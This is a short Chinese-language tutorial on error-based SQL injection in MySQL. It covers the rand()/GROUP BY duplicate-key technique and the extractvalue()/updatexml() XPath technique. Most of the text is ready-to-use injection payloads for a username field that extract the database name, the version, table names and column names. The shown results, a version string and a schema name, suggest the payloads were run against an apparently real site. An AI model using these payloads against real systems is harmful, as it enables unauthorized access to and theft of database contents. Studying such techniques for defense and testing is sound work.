0x00 关于错误回显
0x01 用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)
第一种: 基于 rand() 与 group by 的错误
首先看一下关于rand()函数与group by 在mysql中的错误报告,没错,我们就是要利用group by part of rand() returns duplicate key error这个bug。
RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.
这个bug会爆出duplicate key这个错误,然后顺便就把数据也给爆了:P
公式:username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(你想获取的数据的sql语句))x from information_schema.tables group by x )a) and '1' = '1
第二种: XPATH爆信息
这里主要用到的是ExtractValue()和UpdateXML()这2个函数,由于mysql 5.1以后提供了内置的XML文件解析和函数,所以这种注入只能用于5.1版本以后
语法:EXTRACTVALUE (XML_document, XPath_string);
公式1:username=admin' and (extractvalue(1, concat(0x7e,(你想获取的数据的sql语句)))) and '1'='1公式2:username=admin' and (updatexml(1, concat(0x7e,(你想获取的数据的sql语句)),1)) and '1'='1
带上代码:payload id=330&sid=19&cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2),0x23,(select database()))x from information_schema.tables group by x )a) and '1' = '1然后爆他的数据库版本 结果:5.1.61-Alibaba-rds-201404-log
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2),0x23,(select version()))x from information_schema.tables group by x )a) and '1' = '1
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2),0x23,(select column_name from information_schema.tables where table_schema = 'r0866cplushua' limit 0,1))x from information_schema.tables group by x )a) and '1' = '1
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2),0x23,(select column_name from information_schema.columns where table_name='motto' and table_schema = 'r0866cplushua' limit 0,1))x from information_schema.tables group by x )a) and '1' = '1